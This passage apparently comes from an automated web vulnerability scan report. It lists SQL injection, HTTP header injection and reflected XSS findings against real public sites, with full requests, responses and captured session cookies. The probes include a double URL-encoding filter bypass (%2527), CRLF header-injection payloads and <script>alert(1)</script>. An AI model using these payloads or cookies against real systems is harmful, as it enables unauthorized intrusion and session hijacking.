Date: Sat, 30 Apr 2011 12:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://www.budget.state.pa.us:80/portal/server.pt/gateway''/PTARGS_0_2_38668_4566_458236_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.7. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /portal/server.pt/gateway%2527/PTARGS_0_2_39070_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
PT-HTTPResponse-Type: SESSION_TIMEOUT
PT-Login-URL: http://www.budget.state.pa.us/portal/server.pt?space=Login&cached=false
Pragma: no-cache
Content-Language: en
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=; path=/
Expires: 1304080195683
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304166595683
Content-Type: text/html; charset=utf-8
Content-Length: 26799

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
ject, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
   gSafeJSVarContainer[strName] = oValue;
   return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal
...[SNIP]...

Request 2

GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_39070_4566_458236_43/http HTTP/1.1
Host: www.budget.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=uik0x145tlcpdsedjzdxtmqz;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /portal/SSORedirect.aspx?
Set-Cookie: plloginoccured=false; path=/
Set-Cookie: REQUESTURLBEFORESSO=http://www.budget.state.pa.us:80/portal/server.pt/gateway%27%27/PTARGS_0_2_39070_4566_458236_43/http; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 357

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/portal/SSORedirect.aspx?">here</a>.</h2>
</body></html>
<!--Hostname: ENCTCISP270--><!--Total Request Time: -1
Con
...[SNIP]...

1.8. http://www.vsea.org/join-your-union [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /join-your-union?1'=1 HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:17:12 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:17:12 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /join-your-union?1''=1 HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:17:14 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:17:14 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...

1.9. http://www.vsea.org/sites/vsea.org/themes/unionproud2/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /sites/vsea.org/themes/unionproud2/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /sites/vsea.org/themes%2527/unionproud2/favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 29 Apr 2011 22:20:01 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:20:03 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /sites/vsea.org/themes%2527%2527/unionproud2/favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 29 Apr 2011 22:20:05 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:20:05 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...

1.10. http://www.vsea.org/sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.vsea.org
Path:   /sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /sites/vsea.org/themes%2527/unionproud2/splash_flash/slideShow.swf HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:19:01 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:19:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<script type="text/javascript">$(window).load(function(){$('.status').Pulsate(200, 6);$('.error').Pulsate(200, 6);});</script>
...[SNIP]...

Request 2

GET /sites/vsea.org/themes%2527%2527/unionproud2/splash_flash/slideShow.swf HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:19:03 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:19:03 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...

2. HTTP header injection  previous  next
There are 5 instances of this issue:


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload e49bd%0d%0a59c112e0288 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=128&bwVal=e49bd%0d%0a59c112e0288&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=a3ac447e-4ff7-4236-8fa8-7b9e749842b33HS080; expires=Fri, 29-Jul-2011 08:18:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=e49bd
59c112e0288
&BWDate=40663.346366&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload d372e%0d%0acccbab88b97 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=d372e%0d%0acccbab88b97&wmpv=0&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=870212d3-2f21-4fa2-8e03-d2dfc0432b973HS020; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=d372e
cccbab88b97
&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload dc1e1%0d%0a2a2f0567f4f was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=0&res=dc1e1%0d%0a2a2f0567f4f&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=84d88477-c309-4ed1-b009-c75e2ccf2de23HS060; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=10.2154&RES=dc1e1
2a2f0567f4f
&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:44 GMT
Connection: close
Content-Length: 0


2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 31719%0d%0ace2df32a2d8 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5153469~~0~~~^eb75Per_Played~0~14453476~01010^ebVideoFullPlay~0~14453476~01010^ebAdDuration~189~0~01020^ebAboveTheFoldDuration~189~0~01020^ebVideoPlayDuration~41~0~01010^ebVideoAssetDuration~41~14453476~01010&OptOut=0&ebRandom=0.9262445359490812&flv=10.2154&wmpv=31719%0d%0ace2df32a2d8&res=128&bwVal=737&bwTime=1304165755979 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://io9.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.io9%2Ffront%3Bptile%3D3%3Bsz%3D300x250%3Bord%3D96869397%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dgawker%3Bvisited%3Dio9front%3Bvisited%3Dgawkerfront%3F&rand=96869393&nocache=true
Origin: http://io9.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=aef03abd-dd91-446d-b768-963740a2915b3HS020; expires=Fri, 29-Jul-2011 08:18:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=737&BWDate=40663.346354&debuglevel=&FLV=10.2154&RES=128&WMPV=31719
ce2df32a2d8
; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 30 Apr 2011 12:18:45 GMT
Connection: close
Content-Length: 0


2.5. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wbtdcs.nara.gov
Path:   /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e8809%0d%0a3db0a68c794 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e8809%0d%0a3db0a68c794/dcs.gif?&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2 HTTP/1.1
Host: wbtdcs.nara.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:49:38 GMT
Server: Apache
Location: /e8809
3db0a68c794
/dcs.gif?dcsredirect=1&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2
Set-Cookie: WEBTRENDS_ID=173.193.214.243-2072764016.30148304; path=/
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
ETag: "3d-2b-1e369c80"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3. Cross-site scripting (reflected)  previous  next
There are 250 instances of this issue:


3.1. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb4e8<script>alert(1)</script>fe50c6cc575 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384eb4e8<script>alert(1)</script>fe50c6cc575?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 30 Apr 2011 15:09:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384eb4e8<script>alert(1)</script>fe50c6cc575

3.2. http://agency.governmentjobs.com/tennessee/default.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://agency.governmentjobs.com
Path:   /tennessee/default.cfm

Issue detail

